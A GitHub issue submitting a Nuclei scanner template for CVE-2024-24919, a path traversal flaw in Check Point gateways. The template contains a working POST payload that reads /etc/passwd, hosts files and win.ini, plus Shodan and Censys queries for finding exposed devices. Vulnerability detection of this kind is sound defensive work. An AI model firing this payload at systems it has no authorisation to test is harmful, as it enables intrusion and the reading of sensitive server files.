### ISSUE TITLE
CVE-2024-24919

### ISSUE THREAD

**Issue by theeldruin** [projectdiscovery/nuclei-templates#9983]
### Template Information:

CVE-2024-24919
Testing for Path Traversal on CheckPoint, allowing read server files
Files tested:
- /etc/hosts
- /etc/passwd
- /windows/win.ini
- windows/system32/drivers/etc/hosts

### Nuclei Template:

```yaml
id: CVE-2024-24919

info:
  name: Directory Traversal Check
  author: Bruno a.k.a "eldruin"
  severity: high
  description: Test for directory traversal vulnerability by attempting to access common system files.
  reference: https://nvd.nist.gov/vuln/detail/CVE-2024-24919
  tags: checkpoint, lfi, pathtraversal
  metadata:
    shodan-query: '"Server: Check Point SVN" "X-UA-Compatible: IE-EmulateIE7"'
    censys-query: '(("Check Point SVN" and services.port=443))'

http:
  - method: POST
    path:
      - "{{BaseURL}}/clients/MyCRL"
    body: "aCSHELL/../../../../../../../../..{{file}}"

    payloads:
      file:
        - /etc/hosts
        - /etc/passwd
        - /windows/win.ini
        - /windows/system32/drivers/etc/hosts
  
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"  # /etc/passwd
          - "127.0.0.1"  # /etc/hosts or windows hosts
          - "\\[fonts\\]"  # win.ini
          - "Generated"  # /etc/hosts
        condition: or
```
### Result
![2024-06-05_11-17](https://github.com/projectdiscovery/nuclei-templates/assets/77182365/6f21bab1-5b93-49da-b507-26efa7207db1)
